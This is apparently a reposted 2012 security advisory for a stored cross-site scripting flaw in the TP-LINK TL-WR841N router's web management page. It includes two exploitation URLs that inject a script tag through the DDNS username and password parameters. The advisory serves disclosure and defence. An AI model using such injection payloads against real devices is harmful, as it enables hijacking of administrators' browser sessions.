TP-LINK TL-WR841N 3.13.9 Cross Site Scripting

2012.11.21
Credit: Matan Azugi
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

=| Security Advisory - TP-LINK TL-WR841N XSS (Cross Site Scripting) |= Issue: TL-WR841N 300Mbps Wireless N Router by "TP-LINK" Firmware Version: 3.13.9 Build 120201 Rel.54965n and Below Discovered Date: 17/11/2012 Author: Matan Azugi [matan@madsec.co.il] Product Vendor: http://www.tp-link.com/en/products/details/?model=TL-WR841N Details: TP-LINK TL-WR841N Wireless Router is prone to Cross Site Scripting Vulnerability. The vulnerability exists in Web-Based Management. Remote authenticated administrators may inject arbitrary JavaScript or HTML via the username parameter or via pwd parameter to exploit Stored Cross Site Scripting condition. Exploitation URL: 1. http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=a1234</script ><script>alert(1)</script>12aaa34f5be&pwd=password&cliUrl=&Save=Save 2. http://192.168.0.1/userRpm/NoipDdnsRpm.htm?provider=3&username=1234&pwd=a123 4</script><script>alert(1)</script>12aaa34f5be&cliUrl=&Save=Save Successful exploitation allows the attacker to steal user information and may allow the attacker to take full control over the user Browser.

References:

http://www.tp-link.com/en/products/details/?model=TL-WR841N


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top